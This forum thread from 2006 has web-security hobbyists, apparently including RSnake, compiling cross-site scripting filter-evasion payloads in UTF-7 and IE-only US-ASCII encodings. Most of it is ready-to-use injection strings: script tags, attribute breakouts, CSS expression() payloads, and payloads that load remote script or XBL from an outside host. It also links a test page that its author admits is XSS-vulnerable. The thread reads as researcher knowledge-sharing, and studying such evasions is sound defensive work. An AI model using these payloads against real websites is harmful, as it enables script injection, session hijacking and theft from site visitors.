Thanks to RSnake for opening my eyes to alternate encoding recently, with his blog .. i was hoping to concentrate the knowledge (and questions) here..

particularly sample strings to plug in for each encoding that'll get around standard filters for ',",<,> and allow script that executes.

UTF-7
can use [maluc.sitesled.com] for encoding (might be worth adding to the bottom of the cheat sheet)

<script>alert(1)</script> to +ADw-script+AD4-alert(1)+ADw-/script+AD4-
"><script>alert("XSS")</script> to +ACIAPgA8-script+AD4-alert(+ACI-XSS+ACI-)+ADw-/script+AD4-
<script src=http://ha.ckers.org/s.js?> to +ADw-script src+AD0-[ha.ckers.org]-
" style="-moz-binding:url('http://ha.ckers.org/xssmoz.xml#xss')" to +ACI- style+AD0AIg--moz-binding:url('http://ha.ckers.org/xssmoz.xml+ACM-xss')+ACI-
";alert(1);// to +ACIAOw-alert(1)+ADs-//

i'll add other encodings as i understand them .-. .. using the same 5 sample injections. unless there is a better shortlist of injections to list

and while incomplete, this works in IE-only for US-ASCII:

<script>alert(1)</script> to ¼script¾alert(1)¼/script¾
"><script>alert("XSS")</script> to ¢¾¼script¾alert(¢XSS¢)¼/script¾

i know it's not new, just concentrating info .. more later - and feel free to contribute cause i'm very new to uncommon encoding methods ^^

-maluc

This is a good list. We should definitely try to keep it up to date as new things arise.

- RSnake
Gotta love it. http://ha.ckers.org

here's a very simplistic php script i uploaded for testing different encoding methods..

i realize it's XSSable - i really don't care _-_

[maluc.110mb.com]
Usage:

http://maluc.110mb.com/charsettest.php?charset&string

-maluc

Yay! nice work maluc! is this info being collected somewhere for quick reference? cause i see it scattered accross the boards.

yeah, it's mostly so i don't have to search everywhere for each encoding's quirks. Normally i'd throw it all into a random .txt file, but i thought others might benefit too.. it'll be a hodgepodge for now, but later i'll compile it into that first post

Continuing with US-ASCII (these are IE-only):

Alternative Quotations: ¢§ .. which are %A2,%A7 respectively.
Alternative semi-colon: » .. which is %BB
" style="xx:expresstion(alert('XSS'))" to ¢ style=¢xx:expression(alert(§XSS§))¢
";alert(1);// to ¢;alert(1);//
';alert(1);// to §;alert(1);//

à (%E0) is the equivalent for tildes, which don't seem to work in IE7

Edit: removed -moz-binding and changed to xx:expression, since its IE-only

-maluc



Edited 1 time(s). Last edit at 11/29/2006 04:18AM by maluc.

lol.. now why did i add a -moz-binding for US-ASCII, an IE-only encoding.. removed.

-maluc

Hahah... I never would have noticed unless you said something. There are really too many moving parts to web security to keep it all on the top of your head all at the same time.

- RSnake
Gotta love it. http://ha.ckers.org

:D

moving parts... ^-^